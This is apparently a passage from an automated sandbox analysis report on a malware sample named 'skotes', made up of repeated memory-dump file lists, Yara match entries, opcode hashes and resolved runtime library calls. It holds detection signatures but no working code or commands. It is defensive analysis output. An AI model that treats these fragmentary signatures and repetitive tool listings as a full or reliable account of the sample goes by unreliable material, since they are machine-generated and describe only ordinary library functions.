                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 78362717-0
                                                                                                                                                                                                                                          • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                          • Instruction ID: 4ea8f7a2edf0eb4553534135f1ebfe9a1fe26084ef659da0fb3d562c41e8bab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6101FD32600524A7CF1AFA648841FFFB7ABDB84310F00801DFC16AB382DA70EE1193A0
                                                                                                                                                                                                                                          Function 006B9510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 006B9519
                                                                                                                                                                                                                                            • Part of subcall function 006AF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 006B5486
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 006B953D
                                                                                                                                                                                                                                          • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 006B9550
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 006B9559
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 218105897-0
                                                                                                                                                                                                                                          • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction ID: 9291e4c0b5223cd497c7f54e31613961fafa865e7ec75c7888f5bca45862ac95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F037B1640B105EE6B2AB548811FEA23DBDF44715F00C41DE65B97242CE24FDC2CFA5
                                                                                                                                                                                                                                          Function 006CF1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006CF232
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006CF298
                                                                                                                                                                                                                                            • Part of subcall function 006CB04B: RtlAllocateHeap.NTDLL(00000000,440B685B,?,?,006AD3FC,440B685B,?,006A7A8B,?,?,?,?,?,?,00697465,?), ref: 006CB07D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID: Zl,ml
                                                                                                                                                                                                                                          • API String ID: 809856575-2199340090
                                                                                                                                                                                                                                          • Opcode ID: b27cc5241a7db5ff1a0056b76b645e164b9c0cdde7e21d46dbcf8978b9e4d1dc
                                                                                                                                                                                                                                          • Instruction ID: 28b5df55670d2ab2ca8370b51b352e81b3d0d5dd0d19b0f17b5415af5dc4b75e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b27cc5241a7db5ff1a0056b76b645e164b9c0cdde7e21d46dbcf8978b9e4d1dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21317C71A0021AABDB219FA5CC41EFF7BABEF45310F05412CF814A7251DB388E51CBA4
                                                                                                                                                                                                                                          Function 006C1704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006C1764
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C17AF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                          • Opcode ID: 69d5252c3d34cbf2c9902ac4443cfc832f426d133471714aa32e118bfbc315ff
                                                                                                                                                                                                                                          • Instruction ID: 2460718df925cb0f746462e554d58a49930e2890d1d2d7b89c31e19b0b1ea65c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d5252c3d34cbf2c9902ac4443cfc832f426d133471714aa32e118bfbc315ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E511A235A002149BCB55AF58C485EBD77A7EF87360B15806DE912AF343DB74ED018AE4
                                                                                                                                                                                                                                          Function 006B0C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 006B0CD7
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 006B0D2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
